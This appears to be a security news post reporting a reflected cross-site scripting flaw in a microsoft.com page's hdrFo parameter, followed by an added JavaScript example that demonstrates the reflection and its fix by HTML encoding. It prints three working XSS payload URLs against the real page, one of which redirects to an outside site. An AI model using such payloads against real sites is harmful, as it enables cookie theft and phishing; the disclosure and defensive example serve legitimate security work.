Cross site scripting vulnerability in Microsoft.com
Security researcher @flexxpoint has come up with an interesting find: Microsoft's official website (microsoft.com) is vulnerable to Cross Site Scripting (XSS). The vulnerability is in the URL of the Products page; the hdrFo query parameter is reflected into the page without being encoded.
First payload:
http://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"--><svg><script><!>alert('XSS');document.location.replace('http://ehackingnews.com')</script>

Second payload:
http://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"--></style></script%<svg><!>3E<script>alert('Simple XSS')</script>
Everything after hdrFo= is the injected XSS code. The first payload pops up an alert box that says "XSS" and then redirects the browser to the ehackingnews.com website.
The simplified version of the code:
http://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"--><script>alert("XSS")</script>
Replacing this code with malicious JavaScript would allow an attacker to steal cookies, or the page could be used for a phishing attack. In the past, the same researcher discovered an XSS vulnerability in the Ubuntu website as well.
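To show why the hdrFo parameter is exploitable and what the fix looks like, here is an added example (not code from the post or from Microsoft): a mock of the reflection pattern the payload relies on, beside the same template with output encoding. The hidden-input template is an assumption about the page's markup, not its real source; the input is the simplified proof-of-concept URL from the post.

```javascript
// Added example: assumed reflection pattern for hdrFo, vulnerable and hardened.
// The simplified proof-of-concept URL from the post, used here as test input.
const POC_URL = 'http://www.microsoft.com/en-us/together/possibilities.aspx' +
  '?hdrFo=mthdr02\'"--><script>alert("XSS")</script>';

// Extract the hdrFo query value the way a server would see it (percent-decoded).
function hdrFoParam(url) {
  return new URL(url).searchParams.get('hdrFo') || '';
}

// Encode the five characters that matter in HTML text and attribute contexts.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Assumed vulnerable pattern (hypothetical template, not Microsoft's markup): the raw
// value lands inside a double-quoted attribute, so '" closes the attribute, > closes
// the tag, and the <script> that follows becomes live markup in the response.
function renderUnsafe(hdrFo) {
  return `<input type="hidden" name="hdrFo" value="${hdrFo}">`;
}

// Hardened version: identical template, value HTML-encoded on output, so the quote
// and angle brackets stay inside the attribute as inert entities.
function renderSafe(hdrFo) {
  return `<input type="hidden" name="hdrFo" value="${htmlEncode(hdrFo)}">`;
}

// Crude reflection check for a test harness: does an unencoded <script tag appear?
// Sufficient for this proof of concept; it is not an HTML parser.
function reflectsScript(html) {
  return /<script\b/i.test(html);
}

function demo() {
  const v = hdrFoParam(POC_URL);
  console.log('unsafe :', renderUnsafe(v), '->', reflectsScript(renderUnsafe(v)));
  console.log('safe   :', renderSafe(v), '->', reflectsScript(renderSafe(v)));
}
demo();
```

The same encoding must be applied for every output context the value reaches; a value reflected inside a script block or a URL needs that context's encoder, not the HTML one.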